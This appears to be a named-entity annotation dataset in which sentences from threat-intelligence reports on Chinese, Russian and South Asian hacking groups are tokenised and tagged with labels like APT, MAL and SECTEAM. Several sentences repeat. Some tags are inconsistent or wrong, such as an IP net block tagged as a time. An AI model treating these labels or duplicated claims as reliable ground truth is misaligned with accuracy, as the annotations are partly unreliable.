+believe O +that O +threat O +actors O +may O +compile O +Windows S-OS +and O +Unix O +based O +payloads O +using O +the O +same O +code O +to O +deploy O +Kazuar S-SECTEAM +against O +both O +platforms O +. 
O + +The O +group O +'s O +main O +objective O +is O +to O +steal O +source O +codes O +. O + +In O +2010 S-TIME +HBGary S-SECTEAM +investigated O +an O +information O +security O +incident O +related O +to O +the O +Winnti S-MAL +group O +at O +one O +of O +HBGary S-SECTEAM +'s O +customers O +– O +an O +American B-IDTY +video I-IDTY +game I-IDTY +company E-IDTY +. O + +In O +2010 S-TIME +US-based S-LOC +HBGary S-SECTEAM +investigated O +an O +information O +security O +incident O +related O +to O +the O +Winnti S-MAL +group O +at O +one O +of O +HBGary S-SECTEAM +'s O +customers O +– O +an O +American S-LOC +video B-IDTY +game I-IDTY +company E-IDTY +. O + +For O +a O +long O +time O +the O +Winnti B-APT +group E-APT +had O +been O +considered O +as O +a O +Chinese B-LOC +threat I-LOC +actor E-LOC +targeting O +gaming B-IDTY +companies E-IDTY +specifically O +. O + +In O +April S-TIME +Novetta S-SECTEAM +released O +its O +excellent O +report O +on O +the O +Winnti S-MAL +malware S-MAL +spotted O +in O +the O +operations O +of O +Axiom O +group O +. O + +The O +Axiom S-APT +group O +has O +been O +presented O +as O +an O +advanced O +Chinese B-LOC +threat I-LOC +actor E-LOC +carrying O +out O +cyber-espionage B-ACT +attacks E-ACT +against O +a O +whole O +range O +of O +different O +industries O +. O + +this O +library O +includes O +two O +drivers O +compiled O +on O +August B-TIME +22 E-TIME +and O +September B-TIME +4 E-TIME +, O +2014 S-TIME +. O + +Also O +our O +visibility O +as O +a O +vendor O +does O +not O +cover O +every O +company O +in O +the O +world O +( O +at O +least O +so O +far O +; O +) O +) O +and O +the O +Kaspersky B-SECTEAM +Security I-SECTEAM +Network E-SECTEAM +( O +KSN S-SECTEAM +) O +did O +not O +reveal O +other O +attacks O +except O +those O +against O +gaming B-IDTY +companies E-IDTY +. O + +Conversely O +, O +LokiBot S-MAL +and O +Agent B-MAL +Tesla E-MAL +are O +new O +malware O +tools O +. 
O + +Based O +on O +multiple O +active O +compromises O +by O +the O +Axiom O +threat O +group O +, O +Novetta S-SECTEAM +was O +able O +to O +capture O +and O +analyze O +new O +Winnti B-MAL +malware I-MAL +samples E-MAL +. O + +Initial O +attack O +targets O +are O +commonly O +software O +and O +gaming B-IDTY +organizations E-IDTY +in O +United B-LOC +States E-LOC +, O +Japan S-LOC +, O +South B-LOC +Korea E-LOC +, O +and O +China S-LOC +. O + +Initial O +attack O +targets O +are O +commonly O +software O +and O +gaming B-IDTY +organizations E-IDTY +in O +United B-LOC +States E-LOC +, O +Japan S-LOC +, O +South B-LOC +Korea E-LOC +, O +and O +China S-LOC +. O + +The O +samples O +Novetta S-SECTEAM +obtained O +from O +the O +active O +Axiom O +infection O +were O +compiled O +in O +mid- O +to O +late O +2014 S-TIME +and O +represent O +what O +Novetta S-SECTEAM +is O +referring O +to O +as O +version O +3.0 O +of O +the O +Winnti S-APT +lineage O +. O + +We O +assess O +with O +high O +confidence O +that O +the O +Winnti S-MAL +umbrella O +is O +associated O +with O +the O +Chinese B-LOC +state I-LOC +intelligence E-LOC +apparatus O +, O +with O +at O +least O +some O +elements O +located O +in O +the O +Xicheng B-LOC +District I-LOC +of I-LOC +Beijing E-LOC +. O + +The O +Winnti S-MAL +umbrella O +continues O +to O +operate O +highly O +successfully O +in O +2018 S-TIME +. O + +The O +Winnti S-MAL +umbrella O +and O +closely O +associated O +entities O +has O +been O +active O +since O +at O +least O +2009 S-TIME +. O + +The O +Winnti S-APT +and O +Axiom O +group O +names O +were O +created O +by O +Kaspersky B-SECTEAM +Lab E-SECTEAM +and O +Symantec S-SECTEAM +, O +respectively O +, O +for O +their O +2013/2014 S-TIME +reports O +on O +the O +original O +group O +. O + +Their O +operations O +against O +gaming S-IDTY +and O +technology B-IDTY +organizations E-IDTY +are O +believed O +to O +be O +economically O +motivated O +in O +nature O +. 
O + +However O +, O +based O +on O +the O +findings O +shared O +in O +this O +report O +we O +assess O +with O +high O +confidence O +that O +the O +actor O +'s O +primary O +long-term O +mission O +is O +politically O +focused O +. O + +The O +Winnti S-MAL +umbrella O +and O +linked O +groups' O +initial O +targets O +are O +gaming B-IDTY +studios E-IDTY +and O +high B-IDTY +tech I-IDTY +businesses E-IDTY +. O + +During O +the O +same O +time O +period O +, O +we O +also O +observed O +the O +actor O +using O +the O +Browser O +Exploitation O +Framework O +( O +BeEF O +) O +to O +compromise O +victim O +hosts O +and O +download O +Cobalt B-MAL +Strike E-MAL +. O + +In O +this O +campaign O +, O +the O +attackers O +experimented O +with O +publicly B-MAL +available I-MAL +tooling E-MAL +for O +attack B-ACT +operations E-ACT +. O + +The O +primary O +goal O +of O +these O +attacks O +was O +likely O +to O +find O +code-signing O +certificates O +for O +signing O +future O +malware O +. O + +The O +Chinese B-LOC +intelligence I-LOC +apparatus E-LOC +has O +been O +reported O +on O +under O +many O +names O +, O +including O +Winnti S-MAL +, O +PassCV O +, O +APT17 O +, O +Axiom O +, O +LEAD O +, O +Barium S-APT +, O +Wicked O +Panda O +, O +and O +GREF O +. O + +The O +attackers O +behind O +observed O +activity O +in O +2018 S-TIME +operate O +from O +the O +Xicheng B-LOC +District I-LOC +of I-LOC +Beijing E-LOC +via O +the O +net O +block O +221.216.0.0/13 S-TIME +. O + +ALLANITE B-ACT +activity E-ACT +closely O +resembles O +Palmetto O +Fusion O +described O +by O +the O +US S-LOC +Department B-SECTEAM +of I-SECTEAM +Homeland I-SECTEAM +Security E-SECTEAM +( O +DHS S-SECTEAM +) O +. O + +ALLANITE B-ACT +activity E-ACT +closely O +resembles O +Palmetto O +Fusion O +described O +by O +the O +US O +Department B-SECTEAM +of I-SECTEAM +Homeland I-SECTEAM +Security E-SECTEAM +. 
O + +ALLANITE O +uses O +email B-ACT +phishing I-ACT +campaigns E-ACT +and O +compromised B-MAL +websites E-MAL +called O +watering B-ACT +holes E-ACT +to O +steal O +credentials O +and O +gain O +access O +to O +target O +networks O +, O +including O +collecting O +and O +distributing O +screenshots O +of O +industrial O +control O +systems O +. O + +In O +October B-TIME +2017 E-TIME +, O +a O +DHS S-SECTEAM +advisory O +documented O +ALLANITE O +technical O +operations O +combined O +with O +activity O +with O +a O +group O +Symantec S-SECTEAM +calls O +Dragonfly S-APT +( O +which O +Dragos S-SECTEAM +associates O +with O +DYMALLOY S-MAL +) O +. O + +In O +October B-TIME +2017 E-TIME +, O +a O +DHS S-SECTEAM +advisory O +documented O +ALLANITE O +technical O +operations O +combined O +with O +activity O +with O +a O +group O +. O + +We O +assess O +with O +high O +confidence O +that O +the O +attackers O +discussed O +here O +are O +associated O +with O +the O +Chinese O +state O +intelligence O +apparatus O +. O + +ALLANITE B-ACT +operations E-ACT +limit O +themselves O +to O +information O +gathering O +and O +have O +not O +demonstrated O +any O +disruptive O +or O +damaging O +capabilities O +. O + +In O +October B-TIME +2017 E-TIME +, O +a O +DHS S-SECTEAM +advisory O +documented O +ALLANITE O +technical O +operations O +combined O +with O +activity O +with O +a O +group O +Symantec S-SECTEAM +calls O +Dragonfly S-APT +. O + +Public O +disclosure O +by O +third-parties O +, O +including O +the O +DHS S-SECTEAM +, O +associate O +ALLANITE B-ACT +operations E-ACT +with O +Russian O +strategic O +interests O +. O + +ALLANITE O +conducts O +malware-less O +operations O +primarily O +leveraging O +legitimate O +and O +available O +tools O +in O +the O +Windows S-OS +operating O +system O +. 
O + +Dragos S-SECTEAM +does O +not O +publicly O +describe O +ICS O +activity O +group O +technical O +details O +except O +in O +extraordinary O +circumstances O +in O +order O +to O +limit O +tradecraft O +proliferation O +. O + +However O +, O +full O +details O +on O +ALLANITE O +and O +other O +group O +tools O +, O +techniques O +, O +procedures O +, O +and O +infrastructure O +is O +available O +to O +network O +defenders O +via O +Dragos B-SECTEAM +WorldView E-SECTEAM +. O + +In O +addition O +to O +maritime O +operations O +in O +this O +region O +, O +Anchor O +Panda O +also O +heavily O +targeted O +western O +companies O +in O +the O +US S-LOC +, O +Germany S-LOC +, O +Sweden S-LOC +, O +the O +UK S-LOC +, O +and O +Australia S-LOC +, O +and O +other O +countries O +involved O +in O +maritime O +satellite O +systems O +, O +aerospace B-IDTY +companies E-IDTY +, O +and O +defense B-IDTY +contractors E-IDTY +. O + +A O +current O +round O +of O +cyber-attacks O +from O +Chinese B-LOC +source I-LOC +groups E-LOC +are O +targeting O +the O +maritime B-IDTY +sector E-IDTY +in O +an O +attempt O +to O +steal O +technology O +. O + +PLA B-LOC +Navy E-LOC +Anchor B-APT +Panda E-APT +is O +an O +adversary O +that O +CrowdStrike S-SECTEAM +has O +tracked O +extensively O +over O +the O +last O +year O +targeting O +both O +civilian O +and O +military O +maritime O +operations O +in O +the O +green/brown O +water O +regions O +primarily O +in O +the O +LOC O +of O +operations O +of O +the O +South B-LOC +Sea I-LOC +Fleet I-LOC +of I-LOC +the I-LOC +PLA I-LOC +Navy E-LOC +. O + +ALLANITE B-ACT +operations E-ACT +continue O +and O +intelligence O +indicates O +activity O +since O +at O +least O +May B-TIME +2017 E-TIME +. O + +APT O +Anchor O +Panda O +is O +a O +Chinese B-LOC +threat I-LOC +actor I-LOC +group E-LOC +who O +target O +maritime O +operations O +. 
O + +According O +to O +cyber O +security O +researchers O +, O +Anchor O +Panda O +, O +who O +work O +directly O +for O +the O +Chinese B-LOC +PLA I-LOC +Navy E-LOC +, O +likely O +remains O +active O +. O + +Dragos S-SECTEAM +does O +not O +corroborate O +nor O +conduct O +political O +attribution O +to O +threat B-ACT +activity E-ACT +. O + +In O +the O +past O +they O +used O +Adobe B-MAL +Gh0st E-MAL +, O +Poison B-MAL +Ivy E-MAL +and O +Torn B-MAL +RAT I-MAL +malware E-MAL +as O +their O +primary O +attack O +vector O +is O +sphere O +phishing S-ACT +. O + +Their O +targets O +are O +marine B-IDTY +companies E-IDTY +that O +operate O +in O +and O +around O +the O +South B-LOC +China I-LOC +Sea E-LOC +, O +an O +LOC O +of O +much O +Chinese S-LOC +interest O +. O + +As O +recently O +as O +this O +past O +week O +, O +researchers O +observed O +Chinese B-LOC +hackers E-LOC +escalating O +cyber-attack O +efforts O +to O +steal O +military O +research O +secrets O +from O +US S-LOC +universities S-IDTY +. O + +The O +cyber-espionage B-ACT +campaign E-ACT +has O +labelled O +the O +group O +Advanced B-APT +Persistent E-APT +Threat B-APT +( I-APT +APT I-APT +) I-APT +40 E-APT +or O +, O +titled O +, O +Periscope S-APT +. O + +The O +group O +has O +been O +active O +since O +at O +least O +January B-TIME +2013 E-TIME +. O + +The O +group O +has O +also O +targeted O +businesses S-IDTY +operating O +in O +the O +South B-LOC +China I-LOC +Sea E-LOC +, O +which O +is O +a O +strategically O +important O +region O +and O +the O +focus O +of O +disputes O +between O +China O +and O +other O +states O +. O + +The O +main O +targets O +seem O +to O +be O +US B-LOC +companies E-IDTY +in O +engineering S-IDTY +, O +transport S-IDTY +and O +defense S-IDTY +, O +although O +it O +has O +targeted O +other O +organizations O +around O +the O +world O +. 
O + +The O +times O +of O +day O +the O +group O +is O +active O +also O +suggests O +that O +it O +is O +based O +near O +Beijing O +and O +the O +group O +has O +reportedly O +used O +malware O +that O +has O +been O +observed O +in O +other O +Chinese B-LOC +operations E-LOC +, O +indicating O +some O +level O +of O +collaboration O +. O + +Periscope O +'s O +activity O +has O +previously O +been O +suspected O +of O +being O +linked O +to O +China S-LOC +, O +but O +now O +researchers O +believe O +their O +evidence O +links O +the O +operation O +to O +the O +Chinese S-LOC +state O +. O + +APT40 S-APT +is O +described O +as O +a O +moderately O +sophisticated O +cyber-espionage O +group O +which O +combines O +access O +to O +significant O +development O +resources O +with O +the O +ability O +to O +leverage O +publicly B-MAL +available I-MAL +tools E-MAL +. O + +Anchor O +Panda O +uses O +website O +and O +web-server O +compromise O +as O +a O +means O +of O +attack O +and O +leverages O +an O +enormous O +cache O +of O +tools O +in O +its O +campaigns S-ACT +, O +to O +include O +exploits O +that O +take O +advantage O +of O +known O +CVE B-MAL +software I-MAL +vulnerabilities E-MAL +. O + +Like O +many O +espionage B-ACT +campaigns E-ACT +, O +much O +of O +APT40 S-APT +'s O +activity O +begins O +by O +attempting O +to O +trick O +targets O +with O +phishing B-ACT +emails S-TOOL +, O +before O +deploying O +malware O +such O +as O +the O +Gh0st B-MAL +RAT I-MAL +trojan E-MAL +to O +maintain O +persistence O +on O +a O +compromised O +network O +. O + +The O +group O +uses O +website O +and O +web-server O +compromise O +as O +a O +means O +of O +attack O +and O +leverages O +an O +enormous O +cache O +of O +tools O +in O +its O +campaigns S-ACT +, O +to O +include O +exploits O +that O +take O +advantage O +of O +known O +CVE B-MAL +software I-MAL +vulnerabilities E-MAL +. 
O + +More O +than O +half O +of O +the O +organizations O +we O +have O +observed O +being O +targeted O +or O +breached O +by O +APT5 O +operate O +in O +these O +sectors O +. O + +APT5 S-APT +has O +been O +active O +since O +at O +least O +2007 S-TIME +. O + +APT5 S-APT +has O +targeted O +or O +breached O +organizations O +across O +multiple O +industries O +, O +but O +its O +focus O +appears O +to O +be O +on O +telecommunications S-IDTY +and O +technology B-IDTY +companies E-IDTY +, O +especially O +information O +about O +satellite B-IDTY +communications E-IDTY +. O + +APT5 S-APT +targeted O +the O +network O +of O +an O +electronics B-IDTY +firm E-IDTY +that O +sells O +products O +for O +both O +industrial S-IDTY +and O +military S-IDTY +applications O +. O + +The O +group O +subsequently O +stole O +communications S-IDTY +related O +to O +the O +firm O +'s O +business O +relationship O +with O +a O +national O +military S-IDTY +, O +including O +inventories O +and O +memoranda O +about O +specific O +products O +they O +provided O +. O + +In O +one O +case O +in O +late B-TIME +2014 E-TIME +, O +APT5 O +breached O +the O +network O +of O +an O +international B-IDTY +telecommunications I-IDTY +company E-IDTY +. O + +The O +group O +used O +malware O +with O +keylogging O +capabilities O +to O +monitor O +the O +computer O +of O +an O +executive O +who O +manages O +the O +company O +'s O +relationships O +with O +other O +telecommunications B-IDTY +companies E-IDTY +. O + +APT5 O +also O +targeted O +the O +networks O +of O +some O +of O +Southeast O +Asia S-LOC +'s O +major O +telecommunications B-IDTY +providers E-IDTY +with O +Leouncia S-MAL +malware S-MAL +. O + +We O +suspect O +that O +the O +group O +sought O +access O +to O +these O +networks O +to O +obtain O +information O +that O +would O +enable O +it O +to O +monitor O +communications O +passing O +through O +the O +providers' O +systems O +. 
O + +The O +FBI S-SECTEAM +said O +the O +" O +group O +of I-APT +malicious I-APT +cyber I-APT +actors E-APT +" O +( O +known O +as O +APT6 S-APT +or O +1.php S-FILE +) O +used O +dedicated O +top-level O +domains O +in O +conjunction O +with O +the O +command O +and O +control O +servers O +to O +deliver O +" O +customized B-MAL +malicious I-MAL +software E-MAL +" O +to O +government O +computer O +systems O +. O + +Deepen S-SECTEAM +told O +Threatpost O +the O +group O +has O +been O +operating O +since O +at O +least O +since O +2008 S-TIME +and O +has O +targeted O +China B-IDTY +and I-IDTY +US I-IDTY +relations I-IDTY +experts E-IDTY +, O +Defense B-SECTEAM +Department E-SECTEAM +entities O +, O +and O +geospatial B-IDTY +groups E-IDTY +within O +the O +federal B-IDTY +government E-IDTY +. O + +Government B-IDTY +officials E-IDTY +said O +they O +knew O +the O +initial O +attack O +occurred O +in O +2011 S-TIME +, O +but O +are O +unaware O +of O +who O +specifically O +is O +behind O +the O +attacks O +. O + +According O +to O +Deepen S-SECTEAM +, O +APT6 S-APT +has O +been O +using O +spear B-ACT +phishing E-ACT +in O +tandem O +with O +malicious O +PDF S-MAL +and O +ZIP S-MAL +attachments O +or O +links O +to O +malware O +infected O +websites O +that O +contains O +a O +malicious O +SCR B-FILE +file E-FILE +. O + +Nearly O +a O +month O +later O +, O +security O +experts O +are O +now O +shining O +a O +bright O +light O +on O +the O +alert O +and O +the O +mysterious O +group O +behind O +the O +attack O +. O + +The O +attacks O +discussed O +in O +this O +blog O +are O +related O +to O +an O +APT B-ACT +campaign E-ACT +commonly O +referred O +to O +as O +" O +th3bug O +" O +, O +named O +for O +the O +password O +the O +actors O +often O +use O +with O +their O +Poison B-MAL +Ivy I-MAL +malware E-MAL +. 
O + +Over O +the O +summer O +they O +compromised O +several O +sites O +, O +including O +a O +well-known O +Uyghur O +website O +written O +in O +that O +native O +language O +. O + +In O +contrast O +to O +many O +other O +APT B-ACT +campaigns E-ACT +, O +which O +tend O +to O +rely O +heavily O +on O +spear B-ACT +phishing E-ACT +to O +gain O +victims O +, O +" O +th3bug O +" O +is O +known O +for O +compromising O +legitimate O +websites O +their O +intended O +visitors O +are O +likely O +to O +frequent O +. O + +While O +we O +were O +unable O +to O +recover O +the O +initial O +vulnerability O +used O +, O +it O +is O +possibly O +the O +same O +CVE-2014-0515 S-VULID +Adobe B-TOOL +Flash E-TOOL +exploit S-VULNAME +first O +reported O +by O +Cisco B-SECTEAM +TRAC E-SECTEAM +in O +late B-TIME +July E-TIME +. O + +However O +, O +to O +increase O +success O +rates O +APT20 S-APT +can O +use O +zero-day S-VULNAME +exploits O +, O +so O +even O +a O +properly O +patched O +system O +would O +be O +compromised O +. O + +Our O +direct O +observation O +of O +in-the-wild O +spearphishing B-ACT +attacks E-ACT +staged O +by O +the O +Bahamut O +group O +have O +been O +solely O +attempts O +to O +deceive O +targets O +into O +providing O +account O +passwords O +through O +impersonation O +of O +notices O +from O +platform B-IDTY +providers E-IDTY +. O + +Bahamut O +was O +first O +noticed O +when O +it O +targeted O +a O +Middle B-IDTY +Eastern I-IDTY +human I-IDTY +rights I-IDTY +activist E-IDTY +in O +the O +first O +week O +of O +January B-TIME +2017 E-TIME +. 
O + +Later O +that O +month O +, O +the O +same O +tactics O +and O +patterns O +were O +seen O +in O +attempts O +against O +an O +Iranian B-IDTY +women I-IDTY +'s I-IDTY +activist E-IDTY +– O +an O +individual S-IDTY +commonly O +targeted O +by O +Iranian B-LOC +actors E-LOC +, O +such O +as O +Charming O +Kitten O +and O +the O +Sima B-ACT +campaign E-ACT +documented O +in O +our O +2016 S-TIME +Black O +Hat O +talk O +. O + +In O +June S-TIME +we O +published O +on O +a O +previously O +unknown O +group O +we O +named O +" O +Bahamut S-APT +" O +, O +a O +strange O +campaign O +of O +phishing S-ACT +and O +malware O +apparently O +focused O +on O +the O +Middle B-LOC +East E-LOC +and O +South B-LOC +Asia E-LOC +. O + +Once O +inside O +a O +network O +, O +APT40 S-APT +uses O +credential-harvesting B-MAL +tools E-MAL +to O +gain O +usernames O +and O +passwords O +, O +allowing O +it O +to O +expand O +its O +reach O +across O +the O +network O +and O +move O +laterally O +through O +an O +environment O +as O +it O +moves O +to O +towards O +the O +ultimate O +goal O +of O +stealing O +data O +. O + +Bahamut S-APT +was O +shown O +to O +be O +resourceful O +, O +not O +only O +maintaining O +their O +own O +Android S-OS +malware S-MAL +but O +running O +propaganda O +sites O +, O +although O +the O +quality O +of O +these O +activities S-ACT +varied O +noticeably O +. O + +In O +June S-TIME +we O +published O +on O +a O +previously O +unknown O +group O +we O +named O +" O +Bahamut S-APT +" O +, O +a O +strange O +campaign O +of O +phishing S-ACT +and O +malware O +apparently O +focused O +on O +the O +Middle B-LOC +East E-LOC +and O +South B-LOC +Asia E-LOC +. O + +Several O +times O +, O +APT5 S-APT +has O +targeted O +organizations S-IDTY +and O +personnel S-IDTY +based O +in O +Southeast B-LOC +Asia E-LOC +. 
O + +However O +, O +in O +the O +same O +week O +of O +September O +a O +series O +of O +spearphishing S-ACT +attempts O +once O +again O +targeted O +a O +set O +of O +otherwise O +unrelated O +individuals O +, O +employing O +the O +same O +tactics O +as O +before O +. O + +Our O +primary O +contribution O +in O +this O +update O +is O +to O +implicate O +Bahamut O +in O +what O +are O +likely O +counterterrorism-motivated O +surveillance O +operations O +, O +and O +to O +further O +affirm O +our O +belief O +that O +the O +group O +is O +a O +hacker-for-hire O +operation O +. O + +As O +we O +wrote O +then O +, O +compared O +to O +Kingphish O +, O +Bahamut O +operates O +as O +though O +it O +were O +a O +generation O +ahead O +in O +terms O +of O +professionalism O +and O +ambition O +. O + +In O +the O +Bahamut O +report O +, O +we O +discussed O +two O +domains S-MAL +found O +within O +our O +search O +that O +were O +linked O +with O +a O +custom B-MAL +Android I-MAL +malware I-MAL +agent E-MAL +. O + +After O +the O +publication O +of O +the O +original O +report O +, O +these O +sites O +were O +taken O +offline O +despite O +the O +fact O +that O +one O +agent O +was O +even O +updated O +a O +six O +days O +prior O +to O +our O +post O +( O +the O +" O +Khuai S-MAL +" O +application O +) O +. O + +FIF O +is O +notable O +for O +its O +links O +to O +the O +Lashkar-e-Taiba S-IDTY +( O +LeT S-IDTY +) O +terrorist O +organization O +, O +which O +has O +committed O +mass-casualty O +attacks O +in O +India S-LOC +in O +support O +of O +establishing O +Pakistani O +control O +over O +the O +disputed O +Jammu O +and O +Kashmir O +border O +region O +. O + +As O +a O +result O +, O +it O +is O +already O +flagged O +as O +Bahamut O +by O +antivirus O +engines O +. 
O + +Our O +initial O +observation O +of O +the O +Bahamut O +group O +originated O +from O +in-the-wild O +attempts O +to O +deceive O +targets O +into O +providing O +account O +passwords O +through O +impersonation O +of O +platform B-IDTY +providers E-IDTY +. O + +One O +curious O +trait O +of O +Bahamut O +is O +that O +it O +develops O +fully-functional O +applications O +in O +support O +of O +its O +espionage O +activities O +, O +rather O +than O +push O +nonfunctional O +fake O +apps O +or O +bundle O +malware O +with O +legitimate B-MAL +software E-MAL +. O + +Curiously O +, O +Bahamut O +appears O +to O +track O +password O +attempts O +in O +response O +to O +failed O +phishing S-ACT +attempts O +or O +to O +provoke O +the O +target O +to O +provide O +more O +passwords O +. O + +Bahamut O +spearphishing S-ACT +attempts O +have O +also O +been O +accompanied O +with O +SMS O +messages O +purporting O +to O +be O +from O +Google S-IDTY +about O +security O +issues O +on O +their O +account O +, O +including O +a O +class O +0 O +message O +or O +" O +Flash S-TOOL +text O +" O +. O +These O +text O +messages O +did O +not O +include O +links O +but O +are O +intended O +to O +build O +credibility O +around O +the O +fake O +service O +notifications O +later O +sent O +to O +the O +target O +'s O +email S-TOOL +address O +. O + +We O +have O +not O +found O +evidence O +of O +Bahamut S-APT +engaging O +in O +crime O +or O +operating O +outside O +its O +limited O +geographic O +domains O +, O +although O +this O +narrow O +perspective O +could O +be O +accounted O +for O +by O +its O +compartmentalization O +of O +operations O +. O + +Thus O +far O +, O +Bahamut S-APT +'s O +campaigns S-ACT +have O +appeared O +to O +be O +primarily O +espionage O +or O +information O +operations O +– O +not O +destructive B-ACT +attacks E-ACT +or O +fraud O +. 
O + +The O +targets O +and O +themes O +of O +Bahamut O +'s O +campaigns S-ACT +have O +consistently O +fallen O +within O +two O +regions O +– O +South B-LOC +Asia E-LOC +( O +primarily O +Pakistan S-LOC +, O +specifically O +Kashmir S-LOC +) O +and O +the O +Middle B-LOC +East E-LOC +( O +from O +Morocco S-LOC +to O +Iran S-LOC +) O +. O + +Our O +prior O +publication O +also O +failed O +to O +acknowledge O +immensely O +valuable O +input O +from O +a O +number O +of O +colleagues O +, O +including O +Nadim O +Kobeissi O +'s O +feedback O +on O +how O +the O +API O +endpoints O +on O +the O +Android S-OS +malware S-MAL +were O +encrypted O +. O + +Bahamut S-APT +targeted O +similar O +Qatar-based S-LOC +individuals O +during O +their O +campaign O +. O + +Bellingcat S-SECTEAM +also O +reported O +the O +domain O +had O +been O +used O +previously O +to O +host O +potential O +decoy B-FILE +documents E-FILE +as O +detailed O +in O +VirusTotal S-TOOL +here O +using O +http://voguextra.com/decoy.doc S-FILE +. O + +The O +China-backed O +Barium S-APT +APT O +is O +suspected O +to O +be O +at O +the O +helm O +of O +the O +project O +. O + +Trojanized O +versions O +of O +the O +utility O +were O +then O +signed O +with O +legitimate O +certificates O +and O +were O +hosted O +on O +and O +distributed O +from O +official O +ASUS O +update O +servers O +– O +which O +made O +them O +mostly O +invisible O +to O +the O +vast O +majority O +of O +protection O +solutions O +, O +according O +to O +Kaspersky B-SECTEAM +Lab E-SECTEAM +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +To O +compromise O +the O +utility O +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +determined O +that O +the O +cyberattackers O +used O +stolen O +digital O +certificates O +used O +by O +ASUS O +to O +sign O +legitimate O +binaries O +, O +and O +altered O +older O +versions O +of O +ASUS O +software O +to O +inject O +their O +own O +malicious O +code O +. 
O + +To O +compromise O +the O +utility O +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +determined O +that O +Barium S-APT +used O +stolen O +digital O +certificates O +used O +by O +ASUS O +to O +sign O +legitimate O +binaries O +, O +and O +altered O +older O +versions O +of O +ASUS O +software O +to O +inject O +their O +own O +malicious O +code O +. O + +BARIUM S-APT +, O +a O +Chinese B-LOC +state E-LOC +player O +that O +also O +goes O +by O +APT17 S-APT +, O +Axiom S-APT +and O +Deputy S-APT +Dog S-APT +, O +was O +previously O +linked O +to O +the O +ShadowPad S-MAL +and O +CCleaner S-MAL +incidents O +, O +which O +were O +also O +supply-chain B-ACT +attacks E-ACT +that O +used O +software B-MAL +updates E-MAL +to O +sneak O +onto O +machines O +. O + +That O +said O +, O +the O +" O +fingerprints O +" O +left O +on O +the O +samples O +by O +the O +attackers O +– O +including O +techniques O +used O +to O +achieve O +unauthorized O +code O +execution O +– O +suggest O +that O +the O +BARIUM B-APT +APT E-APT +is O +behind O +the O +effort O +, O +according O +to O +the O +researchers O +. O + +In O +the O +2017 S-TIME +ShadowPad B-ACT +attack E-ACT +, O +the O +update O +mechanism O +for O +Korean S-LOC +server B-IDTY +management I-IDTY +software I-IDTY +provider E-IDTY +NetSarang O +was O +compromised O +to O +serve O +up O +an O +eponymous O +backdoor O +. O + +In O +the O +next O +incident O +, O +also O +in O +2017 S-TIME +, O +software B-MAL +updates E-MAL +for O +the O +legitimate O +computer O +cleanup O +tool O +CCleaner O +was O +found O +to O +have O +been O +compromised O +by O +hackers O +to O +taint O +them O +with O +the O +same O +ShadowPad B-MAL +backdoor E-MAL +. 
O + +NetSarang O +, O +which O +has O +headquarters O +in O +South B-LOC +Korea E-LOC +and O +the O +United B-LOC +States E-LOC +, O +removed O +the O +backdoored O +update O +, O +but O +not O +before O +it O +was O +activated O +on O +at O +least O +one O +victim O +'s O +machine O +in O +Hong B-LOC +Kong E-LOC +. O + +Given O +our O +increased O +confidence O +that O +Bahamut O +was O +responsible O +for O +targeting O +of O +Qatari S-LOC +labor B-IDTY +rights I-IDTY +advocates E-IDTY +and O +its O +focus O +on O +the O +foreign B-IDTY +policy I-IDTY +institutions E-IDTY +other O +Gulf O +states O +, O +Bahamut O +'s O +interests O +are O +seemingly O +too O +expansive O +to O +be O +limited O +one O +sponsor O +or O +customer O +. O + +Barium S-APT +specializes O +in O +targeting O +high O +value O +organizations O +holding O +sensitive O +data O +, O +by O +gathering O +extensive O +information O +about O +their O +employees S-IDTY +through O +publicly O +available O +information O +and O +social B-IDTY +media E-IDTY +, O +using O +that O +information O +to O +fashion O +phishing B-ACT +attacks E-ACT +intended O +to O +trickthose O +employees S-IDTY +into O +compromising O +their O +computers O +and O +networks O +. O + +We O +identified O +an O +overlap O +in O +the O +domain O +voguextra.com O +, O +which O +was O +used O +by O +Bahamut S-APT +within O +their O +" O +Devoted B-FILE +To I-FILE +Humanity E-FILE +" O +app O +to O +host O +an O +image O +file O +and O +as O +C2 S-TOOL +server O +by O +the O +PrayTime O +iOS O +app O +mentioned O +in O +our O +first O +post O +. 
O + +Althoughthe O +BariumDefendants O +have O +relied O +on O +differentand O +distinct O +infrastructures O +in O +an O +effortto O +evade O +detection O +, O +Bariumused O +the O +same O +e-mail S-TOOL +address O +( O +hostay88@gmail.com S-EMAIL +) O +to O +register O +malicious O +domains O +used O +in O +connection O +with O +at O +least O +two O +toolsets O +that O +Barium S-APT +has O +employed O +to O +compromise O +victim O +computers O +. O + +The O +second O +method O +, O +described O +in O +Part O +D.2 O +, O +below O +, O +involves O +the O +" O +ShadowPad S-MAL +" O +malware O +, O +which O +the O +Barium S-APT +Defendants O +have O +distributed O +via O +a O +third-party B-IDTY +software I-IDTY +provider E-IDTY +'s O +compromised O +update O +. O + +To O +enhance O +the O +effectiveness O +of O +phishing B-ACT +attacks E-ACT +into O +the O +organization O +, O +Barium S-APT +will O +collect O +additional O +background O +informationfrom O +social B-IDTY +media E-IDTY +sites O +. O + +Employing O +a O +technique O +known O +as O +" O +spear B-ACT +phishing E-ACT +" O +, O +Barium S-APT +has O +heavily O +targeted O +individuals O +within O +HumanResources O +or O +Business O +Developmentdepartments O +ofthe O +targeted O +organizations O +in O +order O +to O +compromise O +the O +computers O +ofsuch O +individuals O +. O + +The O +first O +method O +, O +described O +in O +Part O +D.l O +, O +below O +, O +involves O +the O +" O +Barlaiy S-MAL +" O +and O +" O +PlugXL S-MAL +" O +malware O +, O +which O +the O +Barium S-APT +Defendants O +propagate O +using O +phishing B-ACT +techniques E-ACT +. 
